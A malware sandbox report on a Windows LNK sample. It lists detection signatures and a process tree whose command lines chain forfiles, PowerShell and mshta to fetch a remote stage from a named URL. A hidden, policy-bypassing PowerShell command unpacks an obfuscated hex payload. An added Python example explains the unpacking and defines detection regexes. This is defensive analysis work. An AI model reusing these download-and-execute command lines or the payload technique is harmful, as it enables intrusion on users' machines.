Analysis Report: duyba.lnk.download.lnk (Windows)
Overview
General Information
Detection
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connections (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- forfiles.exe (PID: 5524, cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep2, MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
- conhost.exe (PID: 5972, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 984, cmdline: . \*i*\*2\msh*e https://tiffany-careers.com/ghep2, MD5: 04029E121A0CFA5991749937DD22A1D9)
- mshta.exe (PID: 5060, cmdline: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep2, MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- powershell.exe (PID: 4308, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb) {return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean('85EF51FEE837F812F61F1656D38BD83A6C01DC072CBCF246D841948987B9BF3C9407C4F8ABE6B3AC5C50C036D5BF68E3CA56C456FB1B2404AC5CC6C48224E43EFF1648E7AF29CE17BF2F62A8A7C7F4DE07613F737B271AA100A67B779C122AD966C15CB3C823908B36BCCBE9B592D037365125E56312B004E07F513AA459ACF6BFEB51AC31152191AF94E56667A3D2A99C72466ED1996C430D4FDBDAAC444A645133FFD6F506740CE6AE51237562A4307EAF56A5E569B87DC171D550AD8A419C8822B7E0E8357121B4EE75DD16DB89B145D82B1C909ABECFAF2CA7275A13D2BF9E37AD98257B106D88D6988DB290C39C801B5ACD6E2249F2E178FCF16B59452E1DF6068D3A31595646428A980314EE83988BEB6E930DAD4F3640861D45D0A054E18C6A6A1DC88EC8B63FC99EA26D553E7BB5359CA978A904B26D285DA2E961D2C21E99F57B1C7F312913323B86FA89527AF31A5917C2DA9F587D7AD9CE91B6BF628678DF96FAE7AC81A58B57440B8A9E5A64E9BA96EB65240C98299F091495E74DF32B68B79275E2937AB69BF3BD5F0EC1E9A16BF58DA85A870C384779CDAD74B0CCBA5DB9AC7C88E57A05E5FB4B20E10C6C366F1EB3C39148D6FD619830E132F469D25D555A553DD869B43849F23E017958E14F9380CFE36FC613F285B96CA940C562F0BBE8C241411E58D012E23CE1C600E9337A739DB5AE1933D65A4E4AF946B7B1F6CF268BD58702C1B7772610043D981C68C31564F5D9BCBC8CD96ECCFFEEA53D365D01D36E4B3484C95363DD6F39138A67AA362CC9C4190026ABF641C6DF0E5D4A3DE01E05606278D5D2CD0D85DC89F086FAFB7491F9C40F89ED33F7D31C9484F5A8801EF1BABD7938BE509E2133642C8F35CA6BC2E09BEBD5D6E25F0DC30937B429ECB2F268B5D43052547BFA5B9ED413A38A20627D472EFB0F8E5508505831BA8934BFEEB8AE9A4BF2628245B5EC010BF6D308960A15DD28CFFB2D4FDABA50ADBE760CF86DACFCC1CC10A16D02B0C2946FCEDF74A822836F4B0F4975FF46B0CBA3CB495C20FC2E2D372C357A0897500BE09B0F824AA768EAFC28D39243CF341DE1E2A07E5CBD4B0252080E82D760C61806F6F7994A7DE1DCAB9D55F435A87A935C06EC1E878265F121BBA0C1C3B138C1C358E3620FE1A9D778846E6E0CC25C2E6EF13359D6033DE5B1EE13790F98BE7CD35C3B754897DB4583B2B846BCD4E1906C8F2416336E8F269DA57FC2A9824FD6457D1FBC840D50A0EBE6EA5D36FCDCAEB24318E174CC5E33792642277DCC1EBD38F0C1E9233BA2B6E85C963CD7EA29A78A0D2F2F3C1C85EEA9CB646881CEB314F342ECD05D23D5A754721D804D2562F5FDA471331489B61431D4EB09A03B9EF4D7FB5B3E8091B05427A6364A5B6D0281A41D08DF8F77CE3D19BBEDA721A10EB0619CC5BD0A356D2E124CD2962CE26B9E426500BC09F540E75EBD01524B2439910F6000364849B4B849A10268817BBDBE676C5F3DC1D39FA1F1A09760E6B0902B7C52C8F09DE7BF7015A029559284A573439130DC0912C8C12F8AFD9D26F921AF247BD1AFFBD37E1985F8D2709B4CE2681126C3BE8125DB7B0AB4C0CF456

Note on the chain: the argument `. \*i*\*2\msh*e` is PowerShell's call operator applied to a wildcard path rather than a literal file name; expanded against the system drive the pattern selects \Windows\System32\mshta.exe, which is consistent with the next process in the tree (mshta.exe, PID 5060) being launched against the same URL. The `clean` helper in PID 4308 rewrites the embedded hex string into an array of `0xHH` tokens; the remainder of that command line, including whatever consumes the tokens, is truncated above.
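The following Python is an added example and is not part of the sandbox report or of the sample. It re-implements the `clean` helper from the PID 4308 command line, shows how a wildcard path like `\*i*\*2\msh*e` is expanded component by component against a directory tree, and runs a few command-line heuristics modelled on the report's Sigma signatures. The directory tree, the sample command lines, the `example.invalid` URL and the filler hex blob are all constructed for the example; the heuristic names are this example's own, not signature names from the report.

```python
"""Added example, not part of the sandbox report.

Re-implements the sample's hex-unpacking helper, shows how PowerShell
expands the wildcard path from the process tree, and runs command-line
heuristics modelled on the report's Sigma signatures over constructed
command lines."""
import fnmatch
import re

# 1. The helper defined in the PID 4308 command line:
#      function clean ($s) {return -split ($s -replace '..', '0x$& ')}
#    '-replace' rewrites every two characters HH as "0xHH " and the unary
#    '-split' turns the result into whitespace-delimited "0xHH" tokens.
def clean_tokens(hexstr: str) -> list:
    """Mirror of clean(): 'ABCD' -> ['0xAB', '0xCD']."""
    return re.sub(r"..", lambda m: "0x" + m.group(0) + " ", hexstr).split()

def clean_bytes(hexstr: str) -> bytes:
    """The raw bytes the tokens represent. The stage that consumes them
    (key, decode loop) is cut off in the report, so this is as far as the
    visible command line lets an analyst go."""
    return bytes(int(tok, 16) for tok in clean_tokens(hexstr))

# 2. How '. \*i*\*2\msh*e' reaches mshta.exe. PowerShell expands wildcards
#    in a path handed to the call operator one component at a time. This
#    directory tree is constructed for the example (not from the sandbox);
#    it has just enough entries to show the pattern is selective: '*i*'
#    also matches inetpub, but nothing under it matches '*2'.
FAKE_TREE = {
    "": ["Windows", "Users", "inetpub"],
    "Windows": ["System32", "SysWOW64", "Temp"],
    "Windows\\System32": ["cmd.exe", "mscoree.dll", "mshta.exe", "msiexec.exe"],
    "Windows\\SysWOW64": ["mshta.exe"],
    "inetpub": ["wwwroot"],
}

def resolve_wildcard_path(pattern: str, tree: dict = FAKE_TREE) -> list:
    """Expand a drive-root-relative wildcard path, case-insensitively as
    Windows does, and return every path it matches."""
    candidates = [""]
    for part in pattern.lstrip("\\").split("\\"):
        matched = []
        for base in candidates:
            for name in tree.get(base, []):
                if fnmatch.fnmatchcase(name.lower(), part.lower()):
                    matched.append(f"{base}\\{name}" if base else name)
        candidates = matched
    return candidates

# 3. Heuristics over process command lines, modelled on the report's
#    signatures: forfiles used as a proxy launcher, execution via a wildcard
#    path, insecure execution policy, hidden window, mshta with a remote
#    URL, and a long embedded hex blob. Names are this example's own.
HEURISTICS = {
    "forfiles_proxy_exec": re.compile(r"forfiles(?:\.exe)?\b.*\s/c\s", re.I),
    "wildcard_path_exec": re.compile(r"(?:^|\s)[.&]\s+\\?\S*\*\S*", re.I),
    "ep_insecure": re.compile(r"-(?:ep|ExecutionPolicy)\s+(?:Unrestricted|Bypass)\b", re.I),
    "window_hidden": re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I),
    "mshta_remote": re.compile(r"mshta(?:\.exe)?\b.*https?://", re.I),
    "long_hex_blob": re.compile(r"[0-9A-F]{200,}", re.I),
}

def classify_cmdline(cmd: str) -> set:
    """Return the names of every heuristic that fires on cmd."""
    return {name for name, rx in HEURISTICS.items() if rx.search(cmd)}

# Constructed command lines patterned on the report's process tree;
# example.invalid stands in for the real URL and the hex blob is filler.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe '
    r'/c "powershell . \*i*\*2\msh*e https://example.invalid/stage2"',
    r'"C:\Windows\System32\mshta.exe" https://example.invalid/stage2',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop '
    r"function clean ($h) {return -split ($h -replace '..', '0x$& ')};$b = clean('"
    + "85EF51FEE837F812" * 20 + "')",
    # benign control: same binary, nothing suspicious on the command line
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command Get-Process',
]

if __name__ == "__main__":
    print(resolve_wildcard_path(r"\*i*\*2\msh*e"))
    print(clean_tokens("85EF51FEE8"))
    for cmd in SAMPLE_CMDLINES:
        print(sorted(classify_cmdline(cmd)) or "no hits", "<-", cmd[:60])
```

The wildcard heuristic is the one worth keeping in a real rule set: a `.` or `&` call operator followed by a path containing `*` has no legitimate use in scheduled tasks, shortcuts or `forfiles /c` payloads, and it catches the technique regardless of which binary the pattern is tuned to select.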